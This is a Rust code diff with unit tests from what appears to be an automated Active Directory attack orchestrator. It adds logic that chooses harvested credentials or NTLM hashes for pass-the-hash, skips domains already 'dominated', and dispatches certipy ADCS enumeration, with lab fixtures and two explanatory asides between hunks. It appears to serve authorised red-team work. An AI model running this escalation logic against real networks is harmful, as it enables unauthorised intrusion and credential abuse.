+ assert_eq!(ace_types.len(), 9);
+ }
+
+ #[test]
+ fn credential_domain_preference() {
+ // Same-domain credential is preferred
+ let domain = "contoso.local";
+ let cred_same = "contoso.local";
+ let cred_other = "fabrikam.local";
+ assert_eq!(cred_same.to_lowercase(), domain.to_lowercase());
+ assert_ne!(cred_other.to_lowercase(), domain.to_lowercase());
+ }
+
+ #[test]
+ fn known_users_collection() {
+ let credentials = [
+ ("admin", "contoso.local"),
+ ("jdoe", "contoso.local"),
+ ("admin", "fabrikam.local"),
+ ];
+ let domain = "contoso.local";
+ let domain_users: Vec<&str> = credentials
+ .iter()
+ .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase())
+ .map(|(u, _)| *u)
+ .collect();
+ assert_eq!(domain_users.len(), 2);
+ assert!(domain_users.contains(&"admin"));
+ assert!(domain_users.contains(&"jdoe"));
+ }
+
+ #[test]
+ fn acl_discovery_work_fields() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = AclDiscoveryWork {
+ dedup_key: "acl_disc:contoso.local:cred".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ known_users: vec!["admin".into(), "jdoe".into()],
+ ntlm_hash: None,
+ ntlm_hash_username: None,
+ };
+ assert_eq!(work.known_users.len(), 2);
+ assert_eq!(work.domain, "contoso.local");
+ }
+
+ // --- collect_acl_discovery_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_but_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into());
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Add cross-domain cred first, then same-domain cred
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_cross_domain_cred_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only a fabrikam credential available for contoso DC — should NOT fall back
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 0, "cross-domain cred should not produce work");
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Credential with empty password
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_empty_password_uses_next() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("nopw", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "haspw");
+ }
+
+ #[test]
+ fn collect_known_users_only_from_same_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].known_users.len(), 2);
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ assert!(work[0].known_users.contains(&"jdoe".to_string()));
+ assert!(!work[0].known_users.contains(&"crossuser".to_string()));
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred");
+ }
+
+ #[test]
+ fn collect_all_empty_password_creds_skips_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("user1", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_credential("user2", "", "fabrikam.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ // No same-domain cred (quarantined) and no hash → skip
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(
+ work.len(),
+ 0,
+ "quarantined same-domain cred should not fall back to cross-domain"
+ );
+ }
+
+ #[test]
+ fn collect_all_credentials_quarantined_skips_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("user1", "contoso.local");
+ state.quarantine_credential("user2", "fabrikam.local");
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_matching_for_creds() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ // Should match via case-insensitive comparison
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "Contoso.Local");
+ }
+
+ #[test]
+ fn collect_known_users_includes_empty_password_users() {
+ // known_users collects ALL creds for the domain, even ones with empty passwords
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("nopw_user", "", "contoso.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ // Both users should appear in known_users (useful for ACE checking)
+ assert_eq!(work[0].known_users.len(), 2);
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ assert!(work[0].known_users.contains(&"nopw_user".to_string()));
+ }
+}
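Aside (not part of the diff): the cred → trust → hash fallback with per-path dedup keys is the load-bearing idea in `collect_acl_discovery_work`. A minimal sketch isolating it, with plain booleans standing in for the real `is_processed` / credential / hash lookups (those names in the comments are the real calls; everything else here is illustrative):

```rust
/// Which auth path a discovery attempt will use, mirroring the ladder above:
/// same-domain cred, then trust-compatible cred, then NTLM hash. Each path
/// has its own dedup key so one failed path never blocks the others.
fn pick_path(
    domain: &str,
    cred_done: bool,  // is_processed(.., "acl_disc:{domain}:cred")
    trust_done: bool, // is_processed(.., "acl_disc:{domain}:trust")
    hash_done: bool,  // is_processed(.., "acl_disc:{domain}:hash")
    has_same_domain_cred: bool,
    has_trust_cred: bool,
    has_ntlm_hash: bool,
) -> Option<String> {
    let d = domain.to_lowercase();
    if !cred_done && has_same_domain_cred {
        return Some(format!("acl_disc:{d}:cred"));
    }
    if !trust_done && has_trust_cred {
        return Some(format!("acl_disc:{d}:trust"));
    }
    if !hash_done && has_ntlm_hash {
        return Some(format!("acl_disc:{d}:hash"));
    }
    None
}

fn main() {
    // Cred and trust paths already burned (e.g. mislabeled credential domain):
    // the hash-based path still fires under its own key.
    let key = pick_path("CONTOSO.LOCAL", true, true, false, true, false, true);
    assert_eq!(key.as_deref(), Some("acl_disc:contoso.local:hash"));
}
```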
diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs
index f46d6a06..da76ef19 100644
--- a/ares-cli/src/orchestrator/automation/adcs.rs
+++ b/ares-cli/src/orchestrator/automation/adcs.rs
@@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> {
.map(|(_, d)| d.to_string())
}
+/// Work item for ADCS enumeration.
+struct AdcsWork {
+ host_ip: String,
+ /// Auth-and-identity dedup key
+ /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`).
+ /// Including the credential identity prevents one wrong-domain attempt
+ /// from permanently locking a CA host against later, possibly-correct creds.
+ dedup_key: String,
+    dc_ip: Option<String>,
+ domain: String,
+ credential: ares_core::models::Credential,
+ /// NTLM hash for pass-the-hash authentication (when no cleartext cred available).
+    ntlm_hash: Option<String>,
+    ntlm_hash_username: Option<String>,
+}
+
+/// Dedup key for a cred-based certipy_find attempt.
+/// Format: `{host}:cred:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String {
+ format!(
+ "{}:cred:{}@{}",
+ host,
+ cred.username.to_lowercase(),
+ cred.domain.to_lowercase()
+ )
+}
+
+/// Dedup key for a hash-based certipy_find attempt.
+/// Format: `{host}:hash:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String {
+ format!(
+ "{}:hash:{}@{}",
+ host,
+ hash.username.to_lowercase(),
+ hash.domain.to_lowercase()
+ )
+}
+
+/// Collect ADCS enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_adcs_work(state: &StateInner) -> Vec<AdcsWork> {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ state
+ .shares
+ .iter()
+ .filter(|s| s.name.to_lowercase() == "certenroll")
+ .filter_map(|s| {
+ let host_lower = s.host.to_lowercase();
+
+ let domain = state
+ .hosts
+ .iter()
+ .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower)
+ .and_then(|h| extract_domain_from_fqdn(&h.hostname))
+ .and_then(|d| {
+ if state.domains.iter().any(|known| known.to_lowercase() == d) {
+ Some(d)
+ } else {
+ state
+ .domains
+ .iter()
+ .find(|known| d.ends_with(&format!(".{}", known.to_lowercase())))
+ .or_else(|| {
+ state
+ .domains
+ .iter()
+ .find(|known| known.to_lowercase().ends_with(&format!(".{d}")))
+ })
+ .cloned()
+ .or(Some(d))
+ }
+ })
+ .or_else(|| state.domains.first().cloned())?;
+
+ // Skip domains we already own — DA on a domain means we don't
+ // need to escalate via its CA. (We may still need ADCS against an
+ // un-owned domain via cross-trust, so this is per-domain not global.)
+ if state.dominated_domains.contains(&domain) {
+ return None;
+ }
+
+ // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host).
+ // Uses resolve_dc_ip() which falls back to scanning hosts list when
+ // domain_controllers doesn't have an entry.
+ let dc_ip = state.resolve_dc_ip(&domain);
+
+ // certipy_find authenticates via LDAP bind to the target DC.
+ // NTLM/Kerberos bind succeeds within the same forest (same domain or
+ // parent/child/sibling) but fails 52e across a forest trust because
+ // the source principal does not exist in the target's domain and
+ // impacket cannot follow Kerberos cross-realm referrals.
+ //
+ // Restrict cred selection to the same forest as the target. If no
+ // same-forest cred exists, skip dispatch — other automations
+ // (foreign_group_enum, mssql_linked_server, golden_cert) handle
+ // the cross-forest foothold path that yields a same-forest cred.
+ //
+ // The dedup key includes the candidate credential's identity, so a
+ // failed first attempt with one cred does not block a later, possibly
+ // correct cred against the same CA host.
+ let domain_lower = domain.to_lowercase();
+ let target_forest = state.forest_root_of(&domain_lower);
+ let cred = {
+ let mut candidates: Vec<&ares_core::models::Credential> = state
+ .credentials
+ .iter()
+ .filter(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain_lower
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .collect();
+ candidates.extend(state.credentials.iter().filter(|c| {
+ let cd = c.domain.to_lowercase();
+ !c.password.is_empty()
+ && cd != domain_lower
+ && state.forest_root_of(&cd) == target_forest
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ }));
+ candidates
+ .into_iter()
+ .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c)))
+ .cloned()
+ };
+
+ // Look for NTLM hash (PTH) only if cred path is exhausted (no
+ // unprocessed cred candidate exists). Same identity-aware dedup.
+ let hash_pick = if cred.is_none() {
+ let pred_admin_same = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty())
+ && h.username.to_lowercase() == "administrator"
+ };
+ let pred_any_same = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty())
+ && !state.is_delegation_account(&h.username)
+ };
+ let same_forest = |h: &&ares_core::models::Hash| -> bool {
+ let hd = h.domain.to_lowercase();
+ !hd.is_empty() && state.forest_root_of(&hd) == target_forest
+ };
+ let pred_admin_xdom = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && same_forest(h)
+ && h.username.to_lowercase() == "administrator"
+ };
+ let pred_any_xdom = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && same_forest(h)
+ && !state.is_delegation_account(&h.username)
+ };
+
+ let mut candidates: Vec<&ares_core::models::Hash> = Vec::new();
+ candidates.extend(state.hashes.iter().filter(pred_admin_same));
+ candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| {
+ h.username.to_lowercase() != "administrator"
+ || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty())
+ }));
+ candidates.extend(
+ state.hashes.iter().filter(pred_admin_xdom).filter(|h| {
+ h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()
+ }),
+ );
+ candidates.extend(
+ state
+ .hashes
+ .iter()
+ .filter(pred_any_xdom)
+ .filter(|h| h.username.to_lowercase() != "administrator"),
+ );
+ candidates
+ .into_iter()
+ .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h)))
+ .cloned()
+ } else {
+ None
+ };
+ let (ntlm_hash, ntlm_hash_username) = match &hash_pick {
+ Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())),
+ None => (None, None),
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ return None;
+ }
+
+ let dedup_key = match (&cred, &hash_pick) {
+ (Some(c), _) => dedup_key_cred(&s.host, c),
+ (None, Some(h)) => dedup_key_hash(&s.host, h),
+ (None, None) => return None,
+ };
+
+ Some(AdcsWork {
+ host_ip: s.host.clone(),
+ dedup_key,
+ dc_ip,
+ domain: domain.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain,
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ ntlm_hash,
+ ntlm_hash_username,
+ })
+ })
+ .collect()
+}
+
/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find.
/// Interval: 30s. Matches Python `_auto_adcs_enumeration`.
pub async fn auto_adcs_enumeration(
@@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration(
break;
}
- // Find CertEnroll shares on unprocessed hosts + get a credential
- let work: Vec<(String, String, ares_core::models::Credential)> = {
+ let work = {
let state = dispatcher.state.read().await;
- let cred = match state
- .credentials
- .iter()
- .find(|c| {
- !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- .or_else(|| state.credentials.first())
- {
- Some(c) => c.clone(),
- None => continue,
- };
- state
+ let creds = state.credentials.len();
+ let hashes = state.hashes.len();
+ let certenroll_shares: Vec<_> = state
.shares
.iter()
.filter(|s| s.name.to_lowercase() == "certenroll")
- .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host))
- .filter_map(|s| {
- // Resolve the domain for this ADCS host by matching the
- // host's FQDN against known domains, or finding which DC
- // subnet the host belongs to. Falls back to first domain.
- let host_lower = s.host.to_lowercase();
- let domain = state
- .hosts
- .iter()
- .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower)
- .and_then(|h| extract_domain_from_fqdn(&h.hostname))
- .and_then(|d| {
- // Verify it's a known domain
- if state.domains.iter().any(|known| known.to_lowercase() == d) {
- Some(d)
- } else {
- // Try parent match (e.g. child.contoso.local → contoso.local)
- state
- .domains
- .iter()
- .find(|known| {
- d.ends_with(&format!(".{}", known.to_lowercase()))
- })
- .or_else(|| {
- state.domains.iter().find(|known| {
- known.to_lowercase().ends_with(&format!(".{d}"))
- })
- })
- .cloned()
- .or(Some(d))
- }
- })
- .or_else(|| state.domains.first().cloned())?;
- Some((s.host.clone(), domain, cred.clone()))
- })
- .collect()
+ .collect();
+ let ce_count = certenroll_shares.len();
+ let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect();
+ let cred_domains: Vec<_> = state
+ .credentials
+ .iter()
+ .map(|c| c.domain.as_str())
+ .collect();
+ let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect();
+ let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect();
+ let w = collect_adcs_work(&state);
+ info!(
+ creds,
+ hashes,
+ certenroll_shares = ce_count,
+ ?ce_hosts,
+ ?cred_domains,
+ ?hash_domains,
+ ?domains,
+ work_items = w.len(),
+ "auto_adcs_enumeration: tick"
+ );
+ w
};
- for (host_ip, domain, cred) in work {
+ for item in work {
+ // Use DC IP for certipy LDAP queries; fall back to CA host IP
+ let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip);
+ // Pass CA host IP separately so the parser sets the correct vuln target
+ // (the CA server, not the DC used for LDAP).
+ let ca_host_ip = if item.dc_ip.is_some() {
+ Some(item.host_ip.as_str())
+ } else {
+ None
+ };
match dispatcher
- .request_certipy_find(&host_ip, &domain, &cred)
+ .request_certipy_find(
+ target_ip,
+ &item.domain,
+ &item.credential,
+ item.ntlm_hash.as_deref(),
+ item.ntlm_hash_username.as_deref(),
+ ca_host_ip,
+ )
.await
{
Ok(Some(task_id)) => {
- info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched");
+ info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched");
dispatcher
.state
.write()
.await
- .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone());
+ .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone());
let _ = dispatcher
.state
- .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip)
+ .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key)
.await;
}
Ok(None) => {}
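Aside (not part of the diff): the same-forest restriction above hinges on `forest_root_of`, which the diff calls but does not show. A sketch under the assumption that it maps a domain to the root of its DNS-suffix chain among known domains; the real implementation may consult trust data instead, so treat this as hypothetical:

```rust
/// Hypothetical forest_root_of: return the shortest known domain that
/// `domain` equals or is a DNS child of. dev.contoso.local and
/// contoso.local share a root; fabrikam.local does not.
fn forest_root_of(known: &[&str], domain: &str) -> String {
    let d = domain.to_lowercase();
    known
        .iter()
        .map(|k| k.to_lowercase())
        .filter(|k| d == *k || d.ends_with(&format!(".{k}")))
        .min_by_key(|k| k.len())
        .unwrap_or(d)
}

fn main() {
    let known = ["contoso.local", "dev.contoso.local", "fabrikam.local"];
    // Child and parent resolve to the same forest root: LDAP bind can succeed.
    assert_eq!(forest_root_of(&known, "dev.contoso.local"), "contoso.local");
    // Cross-forest: different roots, so certipy_find would fail 52e and
    // collect_adcs_work skips dispatch.
    assert_ne!(
        forest_root_of(&known, "fabrikam.local"),
        forest_root_of(&known, "contoso.local")
    );
}
```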
@@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration(
#[cfg(test)]
mod tests {
use super::*;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ fn make_share(host: &str, name: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: String::new(),
+ comment: String::new(),
+ }
+ }
+
+ // --- collect_adcs_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_certenroll_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.50");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret
+ state.credentials.push(cred.clone());
+ // Mark the identity-aware dedup key for the only candidate cred.
+ state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred));
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_certenroll_share_ignored() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "SYSVOL"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "dc01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.fabrikam.local", false));
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabadmin");
+ }
+
+ #[test]
